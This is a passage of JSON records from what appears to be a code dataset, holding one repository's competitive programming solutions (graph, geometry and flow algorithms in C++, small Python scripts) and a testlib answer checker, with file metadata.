printf(\"\\n\");\n }\n}\n\nvoid readln(vector<int> &f, int n)\n{\n int x;\n for (int i = 1; i <= n; i++)\n {\n readln(x);\n f.push_back(x);\n }\n}\n\nvoid writeln(vector<int> &f)\n{\n for (int i = 0; i < f.size(); i++)\n printf(\"%d%c\", f[i], i == f.size() - 1 ? 
'\\n' : ' ');\n}\n\nvoid writeln(int a)\n{\n printf(\"%d\\n\", a);\n}\n\nvoid writeln(int a, int b)\n{\n printf(\"%d %d\\n\", a, b);\n}\n\nvoid writeln(int a, int b, int c)\n{\n printf(\"%d %d %d\\n\", a, b, c);\n}\n\nvoid writeln(int a, int b, int c, int d)\n{\n printf(\"%d %d %d %d\\n\", a, b, c, d);\n}\n\nvoid readln(int &a)\n{\n scanf(\"%d\", &a);\n}\n\nvoid readln(int &a, int &b)\n{\n scanf(\"%d %d\", &a, &b);\n}\n\nvoid readln(int &a, int &b, int &c)\n{\n scanf(\"%d %d %d\", &a, &b, &c);\n}\n\nvoid readln(int &a, int &b, int &c, int &d)\n{\n scanf(\"%d %d %d %d\", &a, &b, &c, &d);\n}\n" }, { "alpha_fraction": 0.4243876338005066, "alphanum_fraction": 0.43876463174819946, "avg_line_length": 29.29032325744629, "blob_id": "fada5acf1becc4e99a5ac0e5259a30a3415c7cb5", "content_id": "e52eabde9495096994f27b8ee4c270928ef65bea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1878, "license_type": "no_license", "max_line_length": 119, "num_lines": 62, "path": "/TopCoder/TC641/B.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "//template igorjan94 version from 05 December 2014\n#include <bits/stdc++.h>\n\n#define forit(it, r) for (auto it = r.begin(); it != r.end(); it++)\n#define FOR(i, m, n) for (int i = m; i < n; ++i)\n#define ROF(i, m, n) for (int i = m; i >= n; --i)\n#define forn1(i, n) for (int i = 1; i < n; ++i)\n#define forn(i, n) for (int i = 0; i < n; ++i)\n#define fori1(n) for (int i = 1; i < n; ++i)\n#define forj1(n) for (int j = 1; j < n; ++j)\n#define fori(n) for (int i = 0; i < n; ++i)\n#define forj(n) for (int j = 0; j < n; ++j)\n\n#define fst first\n#define snd second\n#define pb push_back\n#define ll long long\n#define vi vector<int>\n#define pii pair<int, int>\n#define vll vector<long long>\n#define vvi vector<vector<int> >\n#define pll pair<long long, long long>\n#define whole(a) a.begin(), a.end()\n\nusing namespace std;\n\n#define method int count(vector <int> x, vector <int> 
y)\n\n#define classname TrianglesContainOriginEasy\n\nint ori(pii& a, pii& b, pii& c)\n{\n ll s = -(c.fst * b.snd - b.fst * c.snd) - a.fst * c.snd + a.snd * c.fst + a.fst * b.snd - a.snd * b.fst;\n if (s < 0)\n return -1;\n if (s > 0)\n return 1;\n return 0;\n}\n\nclass classname\n{\n public :\n method\n {\n vector<pii> a;\n int ans = 0;\n int n = x.size();\n fori(n)\n a.pb({x[i], y[i]});\n pii zero = {0, 0};\n fori(n)\n FOR(j, i + 1, n)\n FOR(k, j + 1, n)\n {\n int r = ori(a[i], a[j], a[k]);\n if (ori(a[i], a[j], zero) == r && ori(a[k], a[i], zero) == r && ori(a[j], a[k], zero) == r)\n ans++;\n }\n return ans;\n }\n};\n" }, { "alpha_fraction": 0.33462658524513245, "alphanum_fraction": 0.3617846667766571, "avg_line_length": 24.774999618530273, "blob_id": "859be6fbe7a303cedf673470dcd193a68b35a7cf", "content_id": "a6d6f1c37d454b5c52ca2395359ab194525639b6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1031, "license_type": "no_license", "max_line_length": 54, "num_lines": 40, "path": "/CodeForce/1146/E.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#pragma GCC optimize(\"Ofast\")\n#pragma GCC target(\"avx,avx2,fma\")\n#pragma GCC optimize(\"unroll-loops\")\n\n#include <stdio.h>\n\n#define fori(n) for (int i = 0; i < n; ++i)\n#define BS 8192\n\nint n, q;\nint a[100001];\nint x[100001];\nchar c[100001];\n\nint main()\n{\n scanf(\"%d%d\", &n, &q);\n fori(n)\n scanf(\"%d\", &a[i]);\n fori(q)\n scanf(\" %c%d\", &c[i], &x[i]);\n for (int i = 0; i + BS < n; i += BS)\n for (int t = 0; t < q; ++t)\n if (c[t] == '<')\n for (int j = i; j < i + BS; ++j)\n a[j] = a[j] < x[t] ? -a[j] : a[j];\n else\n for (int j = i; j < i + BS; ++j)\n a[j] = a[j] > x[t] ? -a[j] : a[j];\n for (int t = 0; t < q; ++t)\n if (c[t] == '<')\n for (int j = n / BS * BS; j < n; ++j)\n a[j] = a[j] < x[t] ? -a[j] : a[j];\n else\n for (int j = n / BS * BS; j < n; ++j)\n a[j] = a[j] > x[t] ? 
-a[j] : a[j];\n fori(n)\n printf(\"%d \", a[i]);\n return 0;\n}\n" }, { "alpha_fraction": 0.4226114749908447, "alphanum_fraction": 0.4337579607963562, "avg_line_length": 31.70833396911621, "blob_id": "70779accddd626bc4f99e75848911ad829eac421", "content_id": "ef8c70775b30424a386c97fdafc935d7ccfbf681", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3140, "license_type": "no_license", "max_line_length": 928, "num_lines": 96, "path": "/CodeForce/0320/B.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#include <queue>\n#define enter printf(\"\\n\");\n\nusing namespace std;\nint INF = 1000000007;\nvector< vector<int> > a;\nvector< pair<int, int> > in;\nvector<int> d;\nvector<bool> used;\nqueue<int> q;\n\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\n\nvoid readln(vector<int> &f, int n)\n{\n int x;\n for (int i = 1; i <= n; i++)\n {\n read(x);\n f.push_back(x);\n }\n}\n\nvoid 
writeln(vector<int> &f)\n{\n for (int i = 0; i < f.size(); i++)\n printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');\n}\n\nint main()\n{\n // freopen(\"input.txt\", \"r\", stdin);\n int n;\n readln(n);\n a.resize(n);\n for (int rr = 0; rr < n; rr++)\n {\n int x, y, z;\n readln(x, y, z);\n if (x == 1)\n {\n in.push_back(make_pair(y, z));\n if (in.size() != 1)\n for (int i = 0; i < in.size() - 1; i++)\n {\n if (in[i].first < in[in.size() - 1].first && in[i].second > in[in.size() - 1].first ||\n in[i].first < in[in.size() - 1].second && in[i].second > in[in.size() - 1].second)\n a[in.size() - 1].push_back(i);\n if (in[in.size() - 1].first < in[i].first && in[in.size() - 1].second > in[i].first ||\n in[in.size() - 1].first < in[i].second && in[in.size() - 1].second > in[i].second)\n a[i].push_back(in.size() - 1);\n }\n } else\n {\n y--;z--;\n q.push(y);\n d.clear();\n used.clear();\n d.resize(n + 1, INF);\n used.resize(n + 1, false);\n d[y] = 0;\n used[y] = true;\n bool f = false;\n int u, v;\n while (!q.empty())\n {\n int u = q.front();\n q.pop();\n for (int i = 0; i < a[u].size(); i++)\n {\n int v = a[u][i];\n if (d[v] > d[u] + 1)\n {\n d[v] = d[u] + 1;\n if (!used[v])\n {\n used[v] = true;\n q.push(v);\n }\n }\n }\n }\n f = d[z] != INF;\n if (z >= in.size())\n f = false;\n printf(\"%s\\n\", f ? 
\"YES\" : \"NO\");\n }\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.6270492076873779, "alphanum_fraction": 0.6270492076873779, "avg_line_length": 21.238094329833984, "blob_id": "6a843fffe995fe21a03cc54c249b3ee05d501101", "content_id": "12a366035d8a0847410eee98f65547bb10ee1b79", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 488, "license_type": "no_license", "max_line_length": 107, "num_lines": 21, "path": "/trains/ai/cpp-cgdk/model/OilSlick.h", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#pragma once\r\n\r\n#ifndef _OIL_SLICK_H_\r\n#define _OIL_SLICK_H_\r\n\r\n#include \"CircularUnit.h\"\r\n\r\nnamespace model {\r\n class OilSlick : public CircularUnit {\r\n private:\r\n int remainingLifetime;\r\n public:\r\n OilSlick();\r\n OilSlick(long long id, double mass, double x, double y, double speedX, double speedY, double angle,\r\n double angularSpeed, double radius, int remainingLifetime);\r\n\r\n int getRemainingLifetime() const;\r\n };\r\n}\r\n\r\n#endif\r\n" }, { "alpha_fraction": 0.4642857015132904, "alphanum_fraction": 0.5714285969734192, "avg_line_length": 13, "blob_id": "6662c4852519022b4818aef4548e20f70d2a5048", "content_id": "0c146a877bbf4ce54e61c646418d359fc7a2c661", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 28, "license_type": "no_license", "max_line_length": 17, "num_lines": 2, "path": "/CodeForce/1182/A.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "n=input()\nprint(n&1^1)<<n/2\n" }, { "alpha_fraction": 0.5190773010253906, "alphanum_fraction": 0.5339152216911316, "avg_line_length": 29.150375366210938, "blob_id": "a24576179a58ff57a39c9bc3915fd9e2767e2a82", "content_id": "516812c1f1b1f2031b7065503e3002aa1998cb5a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 8020, "license_type": "no_license", "max_line_length": 165, "num_lines": 266, 
"path": "/CodeForce/0642/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 19 March 2015 (deleted unused defines & reorganization from 05 November 2015)\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define forit(it, r) for (auto it = r.begin(); it != r.end(); ++it)\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn1(i, n) for (int i = 1; i < (int) (n); ++i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n\n#define ll long long\n#define pb push_back\n#define vi vector<int>\n#define pii pair<int, int>\n#define vll vector<long long>\n#define pll pair<long long, long long>\n#define whole(a) a.begin(), a.end()\n#define next next__\n#define prev prev__\n#define count count__\n#define argmax(a) (max_element(whole(a)) - (a).begin())\n#define argmin(a) (min_element(whole(a)) - (a).begin())\n\n#define ints(a...) int a; readln(a)\n#define lls(a...) ll a; readln(a)\n#define wr(args...) err(split(#args,',').begin(),args)\n \n#define FILENAME \"input\"\n#define INF 1000000007\n \n#define tthti template<typename Head, typename... Tail> inline\n#define ttt12i template<typename T1, typename T2> inline\n#define ttti template<typename T> inline\n\ninline void writeln2(){cout<<\"\\n\";}\ninline void writeln() {cout<<\"\\n\";}\ninline void readln() {}\nttti void read(T&);\nttti void priws(T);\nttti void print(T);\n\nvoid err(vector<string>::iterator it){++it;}\ntthti void readln (Head& head,Tail&... tail){read(head); readln (tail...);}\ntthti void writeln2(Head head, Tail... tail){print(head);writeln2(tail...);}\ntthti void writeln (Head head, Tail... 
tail){priws(head);writeln2(tail...);}\nttti void writeln_range(T f,T s){if(f!=s)for(auto i=f;i!=s;++i)writeln(*i);}\ntthti void err(vector<string>::iterator it,Head head,Tail...tail){writeln((*it).substr((*it)[0]==' '),\"=\",head);err(++it, tail...);}\nvector<string>split(const string&s,char c){vector<string>v;stringstream ss(s);string x;while(getline(ss,x,c))v.pb(x);return move(v);}\n\n///-------------------------------------------------------------------------------------------------------------------------------------\n//Igorjan\n\n#define PACK_SIZE 10\n\nstruct problem\n{\n int tl, count;\n problem() {}\n problem(int tl, int count) : tl(tl), count(count) {}\n};\nvector<problem> problems;\nvector<vector<int>> ok;\nvector<vector<int>> rj;\nint count = 0;\nint curTime = 0;\nint gid = 0;\n\nstruct submission\n{\n int pid, sid, testPointer, ok, rj, time, extime, gid;\n vector<int> testTime;\n submission() {}\n submission(int sid, int pid, int time) : pid(pid), sid(sid), time(time), testPointer(0), ok(0), rj(0), extime(0)\n {\n testTime.resize(problems[pid].count);\n }\n};\nvector<submission> submissions;\n\nint TEST_COUNT = 40;\nint TIME_DELTA = 12000;\nint RJ_COUNT = 200;\nint WEIGHTED_TESTS = 10;\nstruct cmp\n{\n bool operator() (const int& i, const int& j) const\n {\n submission& a = submissions[i];\n submission& b = submissions[j];\n problem& pa = problems[a.pid];\n problem& pb = problems[b.pid];\n int exa = a.extime == 0 ? pa.tl : a.extime;\n int exb = b.extime == 0 ? 
pb.tl : b.extime;\n //if (a.pid == b.pid)\n //return a.time < b.time;// || a.testPointer > b.testPointer + TEST_COUNT;\n return false\n //|| (a.testPointer > b.testPointer + TEST_COUNT)\n //|| ((a.testPointer < b.testPointer) && (exa * 1ll * (pa.count - a.testPointer + WEIGHTED_TESTS) < exb * 1ll * (pb.count - b.testPointer)))\n //|| (a.time + TIME_DELTA < b.time)\n //|| ((a.rj / (a.rj + 0.0 + a.ok)) > (b.rj / (b.rj + 0.0 + b.ok)) + (RJ_COUNT + 0.0) / 100)\n //|| (a.rj > b.rj + RJ_COUNT)\n || (a.gid < b.gid)\n || false;\n }\n};\npriority_queue<int, vi, cmp> q;\n\nvoid push_submission(int sid)\n{\n submission& s = submissions[sid];\n s.gid = gid++;\n //if (s.testPointer % PACK_SIZE == 0)\n //{\n s.ok = s.rj = 0;\n FOR(i, s.testPointer, s.testPointer + PACK_SIZE)\n s.ok += ok[s.pid][i],\n s.rj += rj[s.pid][i];// * (PACK_SIZE - i) / 2;\n //} \n //else\n //s.ok -= ok[s.pid][s.testPointer] * (PACK_SIZE - (s.testPointer % PACK_SIZE)) / 2,\n //s.rj -= ok[s.pid][s.testPointer] * (PACK_SIZE - (s.testPointer % PACK_SIZE)) / 2;\n q.push(sid);\n}\n\nint pop_submission()\n{\n int temp = q.top();\n q.pop();\n return temp;\n}\n\nint launcher(int numInvokers)\n{\n int use = 0;\n while (use < numInvokers && q.size()) \n {\n submission& s = submissions[pop_submission()];\n if (s.testPointer < problems[s.pid].count)\n {\n while (use < numInvokers && s.testPointer < problems[s.pid].count)\n s.testTime[s.testPointer] = curTime,\n printf(\"%d %d\\n\", s.sid, s.testPointer++),\n ++use;\n if (s.testPointer < problems[s.pid].count)\n push_submission(s.sid);\n }\n }\n return use;\n}\n\nvoid result(int sid, int tid, bool verdict) {\n submission& s = submissions[sid];\n int pid = s.pid;\n if (verdict)\n ok[pid][tid] += 1,\n s.extime = max(s.extime, curTime - s.testTime[tid]);//((s.extime * (s.testPointer + 1)) + curTime - s.time) / (s.testPointer + 2);\n else\n rj[pid][tid] += 1,\n s.testPointer = INF;\n\n if (s.testPointer >= problems[pid].count)\n s.testPointer = INF;\n}\n\nvoid run()\n{\n 
ints(numInvokers, numProblems);\n problems.resize(numProblems);\n ok.resize(numProblems);\n rj.resize(numProblems);\n int x, y;\n fori(numProblems) \n scanf(\"%d%d\", &x, &y),\n problems[i] = problem(x, y),\n ok[i].resize(y + PACK_SIZE, 0),\n rj[i].resize(y + PACK_SIZE, 0);\n int delta = 10;\n int pid, sid, tid;\n char verdict[100];\n int fir = 1, sec = 2;\n while (fir == 1 && sec == 2)\n {\n while (fir == 1)\n {\n fir = scanf(\"%d\", &pid);\n if (pid == -1)\n break;\n sid = submissions.size();\n submissions.push_back(submission(sid, pid, curTime));\n push_submission(sid);\n }\n while (sec == 2)\n {\n sec = scanf(\"%d %d\", &sid, &tid);\n if (sid == -1 && tid == -1)\n break;\n scanf(\"%s\", verdict);\n numInvokers++;\n result(sid, tid, string(verdict) == \"OK\");\n }\n if (numInvokers > 0)\n {\n int use = launcher(numInvokers);\n if (use > numInvokers)\n exit(2);\n numInvokers -= use;\n }\n\n curTime += delta;\n printf(\"-1 -1\\n\");\n fflush(stdout);\n }\n}\n\nint main()\n{\n#ifndef ONLINE_JUDGE\n double time = clock();\n#endif\n //ios_base::sync_with_stdio(false);\n// freopen(FILENAME\".in\", \"r\", stdin);\n// freopen(FILENAME\".out\", \"w\", stdout);\n run();\n#ifndef ONLINE_JUDGE\n writeln(\"execution time =\", (clock() - time) / CLOCKS_PER_SEC);\n#endif\n return 0;\n}\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#define a _a\n#define n _n\nttti ostream&operator<<(ostream&os,vector<T>&a);\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>&a){return os<<a.first<<\" \"<<a.second;}\nttti ostream&operator<<(ostream&os,vector<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";for(int i=1;i<a.size();++i)os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti istream&operator>>(istream&is,vector<T>&a){if(a.size()==0){int n;is>>n;a.resize(n);}for(int i=0;i<a.size();++i)is>>a[i];return is;}\nttti void print(T a){cout<<\" \"<<a;}\nttti void priws(T a){cout<<a;}\nttti void read(T& 
a){cin>>a;}\n" }, { "alpha_fraction": 0.5555555820465088, "alphanum_fraction": 0.5555555820465088, "avg_line_length": 20.600000381469727, "blob_id": "7c869a37da7b1a878d388758d44ed043a0b9f13d", "content_id": "01d7d69a7e7b3e052e1739d591928f004e74063b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 216, "license_type": "no_license", "max_line_length": 100, "num_lines": 10, "path": "/2020/back/F.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import requests\n\nurl = input()\nport = input()\na = input()\nb = input()\n\nres = list(reversed(sorted(requests.get(''.join([url, ':', port, '?', 'a=', a, '&b=', b])).json())))\nfor i in range(len(res)):\n print(res[i])\n" }, { "alpha_fraction": 0.599056601524353, "alphanum_fraction": 0.6064689755439758, "avg_line_length": 41.400001525878906, "blob_id": "cf85c7cc67a056edd067de13a3e580e0f62697ad", "content_id": "16ac7744decccfbc2ba03a34c91bc86d0b8f7287", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1484, "license_type": "no_license", "max_line_length": 117, "num_lines": 35, "path": "/scripts/A+B/checkerA+B.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <testlib.h>\n#include <bits/stdc++.h>\n\nusing namespace std;\n\nstring numberFormat = \"-?[1-9][0-9]*|0\";\n\ntuple<string, string, string, string, string> readAns(InStream& stream)\n{\n string first = stream.readString(numberFormat);\n string second = stream.readString(numberFormat);\n string third = stream.readString(numberFormat);\n string forth = stream.readWord(numberFormat);\n stream.readSpace();\n string fifth = stream.readWord(numberFormat);\n return {first, second, third, forth, fifth};\n}\n\nint main(int argc, char* argv[]) {\n registerTestlibCmd(argc, argv);\n auto [ja, js, jm, jdiv, jmod] = readAns(ans);\n auto [pa, ps, pm, pdiv, pmod] = readAns(ouf);\n if (ja != pa)\n quitf(_wa, \"Test %s: summ is 
incorrect: expected = %s, found = %s\\n\", argv[1], ja.c_str(), pa.c_str());\n else if (js != ps)\n quitf(_wa, \"Test %s: difference is incorrect: expected = %s, found = %s\\n\", argv[1], js.c_str(), ps.c_str());\n else if (jm != pm)\n quitf(_wa, \"Test %s: product is incorrect: expected = %s, found = %s\\n\", argv[1], jm.c_str(), pm.c_str());\n else if (jdiv != pdiv)\n quitf(_wa, \"Test %s: div is incorrect: expected = %s, found = %s\\n\", argv[1], jdiv.c_str(), pdiv.c_str());\n else if (jmod != pmod)\n quitf(_wa, \"Test %s: mod is incorrect: expected = %s, found = %s\\n\", argv[1], jmod.c_str(), pmod.c_str());\n else\n quitf(_ok, \"Test %s: summ, difference, product and divmod are correct!\", argv[1]);\n}\n" }, { "alpha_fraction": 0.44262295961380005, "alphanum_fraction": 0.4773384630680084, "avg_line_length": 25.58974266052246, "blob_id": "bad9207f8c88084643afb9d0834f3c99ea9ea63c", "content_id": "6e21e9b0d55fa35211385d765615989812ed3d5a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1037, "license_type": "no_license", "max_line_length": 113, "num_lines": 39, "path": "/CodeForce/0656/E.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 19 March 2015 (deleted unused defines & reorganization from 05 November 2015)\n#include <bits/stdc++.h>\n\nusing namespace std;\n\nint N;\n\nint readln(vector<int>& a, int i = 0) { return i == N ? 1 : (scanf(\"%d\", &a[i]) + readln(a, i + 1)); }\nint readln(vector<vector<int>>& g, int i = 0) { return i == N ? 1 : readln(g[i]) + readln(g, i + 1); }\n\nint rec(vector<vector<int>>& g, int i = 0, int j = 0, int k = 0)\n{\n g[j][k] = min(g[j][k], g[j][i] + g[i][k]);\n bool x = (k == N - 1);\n k = (k + 1) % N;\n bool y = x && (j == N - 1);\n x ? j = (j + 1) % N : j = j;\n bool z = y && (i == N - 1);\n y ? i = (i + 1) % N : i = i;\n return z ? 
0 : rec(g, i, j, k);\n}\n\nint mx(vector<vector<int>> a, int& m, int i = 0)\n{\n m = max(m, *max_element(a[i].begin(), a[i].end()));\n return i == N - 1 ? 1 : mx(a, m, i + 1);\n}\n\nint main()\n{\n cin >> N;\n vector<vector<int>> g(N, vector<int>(N));\n readln(g);\n rec(g);\n int ans = 0;\n mx(g, ans);\n cout << ans << \"\\n\";\n return 0;\n}\n" }, { "alpha_fraction": 0.37312471866607666, "alphanum_fraction": 0.3941277265548706, "avg_line_length": 21.760974884033203, "blob_id": "12273f9f3c050ae34304fe8b38869a518a41cc86", "content_id": "228e5f7bd643e2b1f0b78ad707d680e4688cfb5a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4666, "license_type": "no_license", "max_line_length": 82, "num_lines": 205, "path": "/trash/lab_da_smthng/minimax/CC.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#define ll int\n#include <cstdlib>\n#include <iostream>\n#include <stack>\n#include <vector>\n#include <stdio.h>\n#include <queue>\n#define qw printf(\"ololo\\n\");\n\nusing namespace std;\n\nconst int INF = 1000000001;\nint n, size;\nvector< vector< bool > > b;\nvector< vector< int > > answer;\nvector<int> dr, dc, p, minpos, minv;\nvector<bool> vis;\n\nstruct edge\n{\n int y;\n ll p, c, f, opp;\n edge(int e, ll r, ll t, ll u, int a)\n {\n y = e;\n c = r;\n f = t;\n p = u;\n opp = a;\n }\n edge(){};\n};\n\nvector<int> place, pp;\nvector<ll> fi, d;\nvector< vector< edge > > edges;\npriority_queue< pair<ll, int> > q;\nvector<bool> in;\nint s = 0;\nint f, u, v, m;\nll w, curd, mn, dfi;\n\nint dijkstra()\n{\n q.push(make_pair(0, s));\n d.clear();\n d.resize(2 * n + 2, INF);\n d[s] = 0;\n mn = INF;\n while (!q.empty())\n {\n u = q.top().second;\n curd = -q.top().first;\n q.pop();\n if (curd > d[u])\n continue;\n for (int i = 1; i < edges[u].size(); i++)\n {\n if (edges[u][i].c <= edges[u][i].f)\n continue;\n v = edges[u][i].y;\n w = edges[u][i].p;\n if (u == v)\n continue;\n dfi = d[u] + w;\n if (d[v] > dfi)\n 
{\n d[v] = dfi;\n pp[v] = u;\n mn = min(edges[u][i].c - edges[u][i].f, mn);\n place[v] = i;\n q.push(make_pair(-d[v], v));\n }\n }\n }\n return (d[f] == INF) ? -1 : d[f];\n}\n\nint dfs(int k)\n{\n vis[k] = true;\n int t = p[k];\n int temp = k;\n int d = INF;\n for (int j = 1; j <= n; j++)\n if (!vis[j])\n {\n if (edges[t][j].f == 1 && edges[t][j].p - dr[t] - dc[j] < minv[j])\n {\n minv[j] = edges[t][j].p - dr[t] - dc[j];\n minpos[j] = k;\n }\n if (minv[j] < d)\n {\n d = minv[j];\n temp = j;\n }\n }\n for (int j = 0; j <= n; j++)\n if (vis[j])\n {\n dr[p[j]] += d;\n dc[j] -= d;\n } else\n minv[j] -= d;\n return p[temp] != 0 ? dfs(temp) : temp;\n}\n\nvoid rec(int k)\n{\n p[k] = p[minpos[k]];\n if (minpos[k] != 0)\n rec(minpos[k]);\n}\n\nint ans()\n{\n dr.clear();\n dc.clear();\n p.clear();\n minpos.clear();\n dr.resize(n + 1);\n dc.resize(n + 1);\n p.resize(n + 1);\n minpos.resize(n + 1);\n for (int i = 1; i <= n; i++)\n {\n p[0] = i;\n minv.clear();\n vis.clear();\n minv.resize(n + 1, INF);\n vis.resize(n + 1, false);\n rec(dfs(0));\n }\n answer[size].resize(n + 1);\n for (int i = 1; i <= n; i++)\n edges[p[i]][i].f = 0,\n answer[size][p[i]] = i;\n size++;\n return -dc[0];\n}\n\nint main()\n{\n freopen(\"multiassignment.in\", \"r\", stdin);\n freopen(\"multiassignment.out\", \"w+\", stdout);\n int z;\n scanf(\"%d %d\\n\", &n, &z);\n b.resize(n + 2);\n answer.resize(z + 1);\n size = 1;\n f = 2 * n + 1;\n edges.resize(2 * n + 2);\n place.resize(2 * n + 2);\n pp.resize(2 * n + 2);\n int x, y, add;\n int price = 0, c;\n edge e = edge(0, 0, 0, 0, -1);\n for (int i = 0; i <= 2 * n + 1; i++)\n edges[i].push_back(e);\n for (int i = 1; i <= n; i++)\n {\n b[i].resize(n + 1, false);\n edge r0 = edge(i, z, 0, 1, n + 1);\n edges[0].push_back(r0);\n for (int j = 1; j <= n; j++)\n {\n scanf(\"%d\", &x);\n edge r = edge(n + j, 1, 0, x, edges[n + j].size());\n edge r5 = edge(i, 0, 0, -x, edges[i].size());\n edges[i].push_back(r);\n edges[j + n].push_back(r5);\n }\n scanf(\"\\n\");\n 
}\n for (int i = 1; i <= n; i++)\n {\n edge r8 = edge(0, 0, 0, -1, i);\n edge r2 = edge(2 * n + 1, z, 0, 1, edges[2 * n + 1].size());\n edge r7 = edge(i + n, 0, 0, -1, edges[i + n].size());\n edges[i].push_back(r8);\n edges[i + n].push_back(r2);\n edges[2 * n + 1].push_back(r7);\n }\n fclose(stdin);\n while (true)\n {\n add = dijkstra();\n if (add == -1)\n break;\n for (int v = f; v != s; v = pp[v])\n edges[pp[v]][place[v]].f += mn,\n edges[edges[pp[v]][place[v]].y][ edges[pp[v]][place[v]].opp ].f -= mn;\n }\n int cost = 0;\n for (int i = 1; i <= z; i++)\n cost += ans();\n printf(\"%d\\n\", cost);\n for (int i = 1; i <= z; i++)\n for (int j = 1; j <= n; j++)\n printf(\"%d%c\", answer[i][j], j == n ? '\\n' : ' ');\n fclose(stdin);\n fclose(stdout);\n return 0;\n}\n" }, { "alpha_fraction": 0.40077605843544006, "alphanum_fraction": 0.4210088551044464, "avg_line_length": 24.05555534362793, "blob_id": "266ea4ae4153695941d913ad74d0ca489c15016e", "content_id": "67c5bd8f665d0af4b76c3ee0acd102b1caa9aef1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3608, "license_type": "no_license", "max_line_length": 107, "num_lines": 144, "path": "/2019/GCJ2/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. 
C++17 version, modified 07 August 2018 (&&, whole) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FILENAME \"input\"\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef valarray<int> va;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define whole(a) begin(a), end(a)\n#define next next__\n#define prev prev__\n#define count count__\n\nconst int MOD = 1000000007;\nconst int INTMAX = numeric_limits<int>::max();\nconst ll LLMAX = numeric_limits<ll>::max();\n\n\n//binSearch\n//x -> min, f(x) == true\ntemplate<typename T, typename F>\nT binSearch(T l, T r, F f, T eps = 1)\n{\n T m;\n while (fabs(r - l) > eps)\n m = l + (r - l) / 2,\n (f(m) ? r : l) = m;\n return f(l) ? 
